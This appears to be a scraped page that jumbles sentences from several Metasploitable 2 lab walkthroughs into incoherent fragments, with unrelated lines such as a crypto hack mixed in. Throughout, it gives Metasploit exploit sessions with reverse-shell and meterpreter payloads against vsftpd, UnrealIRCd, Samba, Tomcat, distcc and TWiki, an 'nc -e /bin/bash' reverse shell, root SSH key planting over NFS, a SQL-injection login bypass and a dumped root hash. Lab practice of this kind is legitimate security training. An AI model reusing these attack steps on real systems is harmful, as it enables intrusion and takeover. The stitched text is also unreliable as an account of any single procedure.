metasploitable 2 list of vulnerabilities

[*] instance eval failed, trying to exploit syscall -- ---- Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Here's what's going on with this vulnerability. whoami Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. More investigation would be needed to resolve it. Every CVE Record added to the list is assigned and published by a CNA. RPORT 3632 yes The target port msf exploit(twiki_history) > set RHOST 192.168.127.154 Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Name Disclosure Date Rank Description This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. Have you used Metasploitable to practice Penetration Testing? -- ---- payload => java/meterpreter/reverse_tcp TOMCAT_PASS no The Password for the specified username For instance, to use native Windows payloads, you need to pick the Windows target. [*] Writing to socket A These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons. payload => linux/x86/meterpreter/reverse_tcp A test environment provides a secure place to perform penetration testing and security research. payload => cmd/unix/reverse The purpose of a Command Injection attack is to execute unwanted commands on the target system. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. DATABASE template1 yes The database to authenticate against Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by. 
RHOST yes The target address The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. msf2 has an rsh-server running and allowing remote connectivity through port 513. USERNAME postgres no A specific username to authenticate as The interface looks like a Linux command-line shell. Proxies no Use a proxy chain Exploit target: :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead RPORT 8180 yes The target port The same exploit that we used manually before was very simple and quick in Metasploit. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: On port 21, Metasploitable2 runs vsftpd, a popular FTP server. Metasploit Pro offers automated exploits and manual exploits. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. And this is what we get: RHOST yes The target address [*] Started reverse double handler Module options (exploit/multi/http/tomcat_mgr_deploy): THREADS 1 yes The number of concurrent threads The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. It is also instrumental in Intrusion Detection System signature development. DB_ALL_USERS false no Add all users in the current database to the list Back on the Login page try entering the following SQL Injection code with a trailing space into the Name field: The Login should now work successfully without having to input a password! Id Name [*] A is input [*] Reading from socket B msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 So let's try out every port and see what we're getting. 
[*] Backgrounding session 1 [*] Reading from socket B It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. [*] A is input -- ---- ---- --------------- -------- ----------- [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war This is the action page. Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. Now you can do some post exploitation. [*] Command: echo f8rjvIDZRdKBtu0F; msf exploit(vsftpd_234_backdoor) > exploit RHOST => 192.168.127.154 Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. Thus, we can infer that the port is TCP Wrapper protected. I employ the following penetration testing phases: reconnaissance, threat modelling and vulnerability identification, and exploitation. Name Disclosure Date Rank Description STOP_ON_SUCCESS => true The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. msf exploit(twiki_history) > set payload cmd/unix/reverse [*] trying to exploit instance_eval When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate. Remote code execution vulnerabilities in dRuby are exploited by this module. It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. 
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. We're going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attacker's machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Module options (exploit/multi/samba/usermap_script): You could log on without a password on this machine. Step 4: Choose Use an existing virtual hard drive file, click the folder icon and select C:/users/UserName/VirtualBox VMs/Metasploitable2/Metasploitable.vmdk. [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 Do you have any feedback on the above examples or a resolution to our TWiki History problem? The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. S /tmp/run Samba 3.x - 4.x on the target has several vulnerabilities that can be exploited using the Metasploit module exploit/multi/samba/usermap_script: set RHOST to your remote machine's IP, then run exploit, and you get root access on the remote machine. After the virtual machine boots, login to console with username msfadmin and password msfadmin. msf exploit(tomcat_mgr_deploy) > set RPORT 8180 Since we noticed previously that the MySQL database was not secured by a password, we're going to use a brute-force auxiliary module to see whether we can get into it. 
We can now look into the databases and get whatever data we may like. Essentially this tests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. -- ---- RHOST yes The target address Module options (auxiliary/scanner/postgres/postgres_login): whoami individual files in /usr/share/doc/*/copyright. Id Name VHOST no HTTP server virtual host Nessus, OpenVAS and Nexpose VS Metasploitable. Metasploitable Networking: [*] Reading from socket B RPORT 80 yes The target port RHOST => 192.168.127.154 payload => cmd/unix/interact Time for some escalation of local privilege. Both operating systems will be running as VMs within VirtualBox. [*] Automatically selected target "Linux x86" Login with the above credentials. [*] Reading from socket B [*] Accepted the second client connection msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it: On port 6667, Metasploitable2 runs the UnrealIRCd IRC daemon. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host root, msf > use auxiliary/admin/http/tomcat_administration Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] [*] chmod'ing and running it -- ---- Metasploitable 2 is a straight-up download. Stop the Apache Tomcat 8.0 Tomcat8 service. Loading of any arbitrary file including operating system files. [*] Started reverse handler on 192.168.127.159:4444 Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. 
Below is a list of the tools and services that this course will teach you how to use. Metasploitable is installed, msfadmin is user and password. LPORT 4444 yes The listen port High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. msf exploit(java_rmi_server) > set LHOST 192.168.127.159 Just enter ifconfig at the prompt to see the details for the virtual machine. So, let's set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. For network clients, it acknowledges and runs compilation tasks. We did an aggressive full port scan against the target. [*] Meterpreter session, using get_processes to find netlink pid RHOSTS yes The target address range or CIDR identifier Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. msf exploit(usermap_script) > set RHOST 192.168.127.154 In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. URIPATH no The URI to use for this exploit (default is random) Let's begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. [*] Matching Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system. These backdoors can be used to gain access to the OS. ---- --------------- -------- ----------- msf exploit(usermap_script) > exploit However this host has old versions of services, weak passwords and weak encryption. Vulnerability Management Nexpose From the results, we can see the open ports 139 and 445. 
Name Current Setting Required Description NetlinkPID no Usually udevd pid-1. However, we figured out that we could use Metasploit against one of them in order to get a shell, so we're going to detail that here. ---- --------------- -------- ----------- Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Name Current Setting Required Description Cross site scripting via the HTTP_USER_AGENT HTTP header. It is freely available and can be extended individually, which makes it very versatile and flexible. Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather outdated OWASP Top 10. Andrea Fortuna. I hope this tutorial helped to install Metasploitable 2 in an easy way. Currently, there is Metasploitable 2, hosting a huge variety of vulnerable services and applications based on Ubuntu 8.04, and there is a newer Metasploitable 3 that is Windows Server 2008, or . Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine. LHOST yes The listen address msf exploit(udev_netlink) > set SESSION 1 What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. Ultimately they all fall flat in certain areas. msf exploit(distcc_exec) > show options Therefore, we'll stop here. For hints & tips on exploiting the vulnerabilities there are also View Source and View Help buttons. 
A reinstall of Metasploit was next attempted: Following the reinstall the exploit was run against with the same settings: This seemed to be a partial success: a Command Shell session was generated and able to be invoked via the sessions 1 command. However the .rhosts file is misconfigured. You can do so by following the path: Applications Exploitation Tools Metasploit. Step 8: Display all the user tables in information_schema. RPORT 23 yes The target port If so please share your comments below. The -e flag is intended to indicate exports: Oh, how sweet! payload => java/meterpreter/reverse_tcp msf exploit(distcc_exec) > set RHOST 192.168.127.154 [*] Successfully sent exploit request Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting Windows operating systems using Metasploit. -- ---- In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. What Is Metasploit? LHOST => 192.168.127.159 [*] Matching Set Version: Ubuntu, and to continue, click the Next button. It requires VirtualBox and additional software. msf exploit(vsftpd_234_backdoor) > show options To access a particular web application, click on one of the links provided. [*] Found shell. 
In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. At a minimum, the following weak system accounts are configured on the system. I thought about closing ports but I read it isn't possible without killing processes. Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. Let's go ahead. [*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2021-02-06 23:31:44 +0300 msf exploit(java_rmi_server) > show options Other names may be trademarks of their respective. Id Name msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. [+] Found netlink pid: 2769 The vulnerabilities identified by most of these tools extend . root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. Commands end with ; or \g. VERBOSE false no Enable verbose output Exploit target: The following sections describe the requirements and instructions for setting up a vulnerable target. msf exploit(postgres_payload) > exploit RHOST yes The target address ---- --------------- -------- ----------- Mitigation: Update . This document outlines many of the security flaws in the Metasploitable 2 image. 
Module options (exploit/linux/postgres/postgres_payload): Module options (exploit/unix/ftp/vsftpd_234_backdoor): gcc root.c -o rootme (This will compile the C file to an executable binary) Step 12: Copy the compiled binary to the msfadmin directory in the NFS share. [*] Command: echo 7Kx3j4QvoI7LOU5z; For this walk-through I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. LPORT 4444 yes The listen port Step 9: Display all the columns fields in the . LHOST => 192.168.127.159 URI => druby://192.168.127.154:8787 According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. msf auxiliary(postgres_login) > show options VHOST no HTTP server virtual host SQLi and XSS on the log are possible; GET for POST is possible because only reading POSTed variables is not enforced. Cross site scripting on the host/ip field; O/S Command injection on the host/ip field; this page writes to the log. Id Name To build a new virtual machine, open VirtualBox and click the New button. Use the showmount Command to see the export list of the NFS server. RPORT 80 yes The target port Name Current Setting Required Description Step 5: Display Database User. [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) The two dashes then comment out the remaining Password validation within the executed SQL statement. 
Both operating systems were virtual machines (VMs) running under VirtualBox. Metasploit is a free open-source tool for developing and executing exploit code. RPORT => 8180 The Metasploit Framework is the most commonly-used framework for hackers worldwide. [*] Accepted the first client connection To transfer commands and data between processes, DRb uses remote method invocation (RMI). USER_AS_PASS false no Try the username as the Password for all users A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact Access To access the vulnerable application, point your browser on Metasploitable3 to http://localhost:8282/struts2-rest-showcase To access the Apache Tomcat Manager, point your browser on Metasploitable3 to http://localhost:8282. On Linux multiple commands can be run after each other using ; as a delimiter: These results are obtained using the following string in the form field: The above string breaks down into these commands being executed: The above demonstrates that havoc could be raised on the remote server by exploiting the above vulnerability. Welcome to the MySQL monitor. The -Pn flag prevents host discovery pings and just assumes the host is up. msf exploit(tomcat_mgr_deploy) > exploit Name Current Setting Required Description This must be an address on the local machine or 0.0.0.0 The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat The main purpose of this vulnerable application is network testing. 
This can be done via brute forcing, SQL injection and XSS via referer HTTP header; SQL injection and XSS via user-agent string. Authentication bypass SQL injection via the username field and password field; SQL injection via the username field and password field; XSS via username field; JavaScript validation bypass. This page gives away the PHP server configuration; application path disclosure; platform path disclosure. Creates cookies but does not make them HTML only. ---- --------------- -------- ----------- msf exploit(usermap_script) > set LHOST 192.168.127.159 Module options (auxiliary/admin/http/tomcat_administration): Payload options (cmd/unix/reverse): This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). First, from the terminal of your running Metasploitable2 VM, find its IP address. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. whoami : CVE-2009-1234 or 2010-1234 or 20101234) In the next tutorial we'll use Metasploit to scan and detect vulnerabilities on this Metasploitable VM. Exploit target: We're on 64-bit Kali, the target is 32-bit, so we compile it specifically for 32-bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). msf exploit(tomcat_mgr_deploy) > show options payload => cmd/unix/reverse -- ---- The compressed file is about 800 MB and can take a while to download over a slow connection. 
[*] Scanned 1 of 1 hosts (100% complete) LHOST => 192.168.127.159 msf exploit(twiki_history) > show options root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor [*] Writing to socket B msf exploit(udev_netlink) > show options [*] Accepted the second client connection msf auxiliary(smb_version) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. It is a low privilege shell; however, we can progress to root through the udev exploit, as demonstrated later. Utilizing login / password combinations suggested by the USER_FILE, PASS_FILE and USERPASS_FILE options, this module tries to validate against a PostgreSQL instance. First let's start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt. Proxies no Use a proxy chain It aids the penetration testers in choosing and configuring exploits. This set of articles discusses the RED TEAM's tools and routes of attack. msf exploit(unreal_ircd_3281_backdoor) > exploit Vulnerable Products: Microsoft Office 2007 SP3/2010 SP2/2013 SP1/2016, Vista SP2, Server 2008 SP2, Windows 7 SP1, Windows 8.1. This allows remote access to the host for convenience or remote administration. Part 2 - Network Scanning. Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. [*] A is input ---- --------------- -------- ----------- -- ---- [*] Writing to socket B Metasploitable 2 offers the researcher several opportunities to use the Metasploit framework to practice penetration testing. daemon, whereis nc This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. 
Name Current Setting Required Description DATABASE template1 yes The database to authenticate against Its GUI has three distinct areas: Targets, Console, and Modules. msf auxiliary(smb_version) > run msf exploit(twiki_history) > exploit [*] Writing to socket B The next service we should look at is the Network File System (NFS). Metasploitable 2 has deliberately vulnerable web applications pre-installed. We can read the passwords now and all the rest: root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid. The primary administrative user msfadmin has a password matching the username. [*] Accepted the first client connection Name Current Setting Required Description [*] Accepted the second client connection msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable . Payload options (java/meterpreter/reverse_tcp): For further details beyond what is covered within this article, please check out the Metasploitable 2 Exploitability Guide. Using this environment we will demonstrate a selection of exploits using a variety of tools from within Kali Linux against Metasploitable V2. https://information.rapid7.com/download-metasploitable-2017.html. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks LHOST yes The listen address This document outlines many of the security flaws in the Metasploitable 2 image. The applications are installed in Metasploitable 2 in the /var/www directory. [*] 192.168.127.154:5432 Postgres - [01/20] - Trying username:'postgres' with password:'postgres' on database 'template1' Step 1: Setup DVWA for SQL Injection. When running as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. RHOST 192.168.127.154 yes The target address However, the exact version of Samba that is running on those ports is unknown. 
RPORT => 445 LHOST => 192.168.127.159 Name Current Setting Required Description RHOSTS yes The target address range or CIDR identifier ---- --------------- -------- ----------- msf exploit(usermap_script) > set RPORT 445 msf > use exploit/multi/misc/java_rmi_server [*] USER: 331 Please specify the password. We will do this by hacking FTP, telnet and SSH services. The web server starts automatically when Metasploitable 2 is booted. Payload options (cmd/unix/interact): Lets see what that implies first: TCP Wrapper is a host-based network access control system that is used in operating systems such as Linux or BSD for filtering network access to Internet Protocol (IP) servers. We chose to delve deeper into TCP/5900 - VNC and used the Metasploit framework to brute force our way in with what ended up being a very weak . msf exploit(usermap_script) > show options -- ---- Reference: Nmap command-line examples Name Current Setting Required Description This tutorial shows how to install it in Ubuntu Linux, how it works, and what you can do with this powerful security auditing tool. [*] Started reverse double handler Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. A malicious backdoor that was introduced to the Unreal IRCD 3.2.8.1 download archive is exploited by this module. [*] Command: echo ZeiYbclsufvu4LGM; Step 3: Set the memory size to 512 MB, which is adequate for Metasploitable2. It gives you everything you need from scanners to third-party integrations that you will need throughout an entire penetration testing lifecycle. [*] B: "qcHh6jsH8rZghWdi\r\n" RPORT 5432 yes The target port Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2. Metasploitable 3 is the updated version based on Windows Server 2008. 
Name Current Setting Required Description [*] Writing to socket A Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux, msf > use auxiliary/scanner/telnet/telnet_version whoami This virtual machine is compatible with VMWare, VirtualBox, and other common virtualization platforms. XSS via logged in user name and signature. The Setup/reset the DB menu item can be enabled by setting the uid value of the cookie to 1. DOM injection on the add-key error message because the key entered is output into the error message without being encoded. You can XSS the hints-enabled output in the menu because it takes input from the hints-enabled cookie value. You can SQL inject the UID cookie value because it is used to do a lookup. You can change your rank to admin by altering the UID value. HTTP Response Splitting via the logged in user name because it is used to create an HTTP header. This page is responsible for cache-control but fails to do so. This page allows the X-Powered-By HTTP header. HTML comments. There are secret pages that if browsed to will redirect the user to the phpinfo.php page. Enable hints in the application by clicking the "Toggle Hints" button on the menu bar: The Mutillidae application contains at least the following vulnerabilities on these respective pages: SQL Injection on blog entry; SQL Injection on logged in user name; Cross site scripting on blog entry; Cross site scripting on logged in user name; Log injection on logged in user name; CSRF; JavaScript validation bypass; XSS in the form title via logged in username; the show-hints cookie can be changed by the user to enable hints even though they are not supposed to show in secure mode. System file compromise; load any page from any site. XSS via referer HTTP header; JS Injection via referer HTTP header; XSS via user-agent string HTTP header. Contains unencrypted database credentials. 
